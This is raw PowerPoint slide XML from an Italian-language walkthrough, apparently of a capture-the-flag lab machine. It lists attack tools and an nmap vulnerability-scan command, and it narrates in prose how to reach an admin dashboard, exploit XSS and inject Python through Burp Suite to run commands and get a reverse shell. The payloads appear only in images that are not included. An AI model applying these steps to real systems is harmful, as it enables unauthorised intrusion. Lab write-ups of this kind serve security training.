                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) Versione: 0.7.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 7.95</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 1.7.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 115.0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 2023.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.revshells.com</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 2.3.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 8.0.33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.crackstation.net/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Qpdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 11.4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>wafw00f</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Kali GNU/Linux Rolling x86_64 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: 6.5.0-kali3-amd64)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OpenVPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2.6.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 10.10.11.12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.urlencoder.io</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89430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Una volta impostato potremmo finalmente accedere a pagine nascosti agli utenti semplici come la pagina /dashboard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, vestiti, persona&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F60D70D-D87B-1703-C8D2-EA2146BE6EB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1139856"/>
            <a:ext cx="6401443" cy="4593035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397555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8" name="Group 57">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9" name="Straight Connector 58">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91" name="Freeform: Shape 90">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Right Triangle 92">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336275" y="725951"/>
            <a:ext cx="5696415" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Questa è una pagina accessibile solo ad admin e quindi possiamo avere accesso a funzionalità più avanzate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Proviamo quindi ad aprire le finestre per poter sfruttare qualche funzionalità.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, vestiti, persona&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860CD289-1374-F114-8790-341C9BFB6C61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3363494" y="2883005"/>
            <a:ext cx="4996781" cy="3260400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488908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B0791448-355B-4C1D-9B97-A1AB0AB2F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5D756A5B-DD91-4D8A-B1EC-46F0B86002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F50CDE-F313-484A-AB7C-F862FE26A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FA8F74-376C-4762-B237-167629A18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5567C7-8A50-4F63-A7EC-01CC19360A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2C25DF-C3FE-46A5-8293-FD7B03BC89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DC0F4C-BBC6-4254-8F07-D302537C2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0A5FDE-1EC7-4FEC-A25F-87170A82D8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FDFF3C-EFF7-4057-BEA7-BE43ACFB2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5D86CF-5724-4259-8E1C-18CCB0673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E7BE7A-933B-4363-BFE7-F305875CEC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BF8566-73D9-484A-A189-E177A4FA8D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B7E051-E63A-47A0-842F-2571954D0C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2ECD2C-CDB4-493A-AFC4-C78D3DA6A1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5746ACB-FD9B-48D7-80A5-52F4A352F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850B347-E244-48A4-9510-8FEF64A91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C76353-BA7D-4E76-9291-09A30B291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6D6040-E575-4B94-850D-CAB01B81A8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6944DE-6823-451C-8330-78EB29B082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92D707-4002-41EC-856D-853F6ADCB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3D330F-59BD-4DE2-AB29-905966638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38927F-1380-4A6D-9E77-DD2D9252D7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714B6F-A72D-4379-8BBB-3794F81AD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E0BCCB-6EF1-4288-95A1-68AD710D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A832D6-2E07-4D72-A04B-7480E682C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ADC8E9-8992-43C2-B945-AD77249DE5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89E78-3B46-4B87-A8E8-4073D03DF0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470A79-A0DB-4794-872A-BA8CF045DA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625F80-F76B-45E6-92C3-333E2CAC90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0B60DAD-4F3A-4AD8-9AA0-8F355473C1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A9EE7E-7DBD-46BA-BAE4-A7506A9FA9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3F64DCC-C016-48B9-9C29-BE156CCAAD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170167"/>
            <a:ext cx="10325000" cy="1630186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Right Triangle 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA9ECCC-3CDE-49CD-AC9D-2A856AB0D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99406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028636"/>
            <a:ext cx="10325000" cy="1071605"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Otteniamo così l’ID dell’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Invoice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Software multimediale, vestiti&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C3D57B-5E72-85EB-A325-1C3567B36C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="28345" b="11778"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="3271957"/>
            <a:ext cx="12205543"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326426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6" name="Group 15">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9" name="Freeform: Shape 48">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ight Triangle 50">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4418418" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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5336275" y="725951"/>
            <a:ext cx="5696415" cy="1918215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Abbiamo ottenuto un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Invoice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. Ora andiamo ad analizzarlo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Andiamo ora nella pagina della generazione del QR Code ed inseriamo l’ID ottenuto precedentemente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, vestiti, persona&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECACC9-E646-0C13-4FA4-36716AD6637C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465634" y="2883005"/>
            <a:ext cx="6792501" cy="3260400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1287992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Aver generato il QR code ci porta ad una nuova pagina in cui possiamo trovare un'altra casella di testo in cui possiamo andare ad inserire del codice JavaScript per effettuare un altro attacco di tipo XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A81347AD-3F39-3634-BC88-902CA351E622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1884024"/>
            <a:ext cx="6401443" cy="3104699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2653830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3" name="Freeform: Shape 15">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48">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5408027" cy="1442463"/>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340131"/>
            <a:ext cx="4424633" cy="3791918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto il nostro obiettivo diventa quello di ottenere una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RevesrShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Aprendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> andiamo a modificare un attributo per iniettare il nostro codice Python. Esso però dovrà essere completato in quanto non ci apre una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ReverseShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ma ci permette di eseguire comandi arbitrari sulla macchina target.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{822806F6-A5B8-1C4D-12EF-B7992C328E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087094" y="1985199"/>
            <a:ext cx="4401655" cy="2894088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
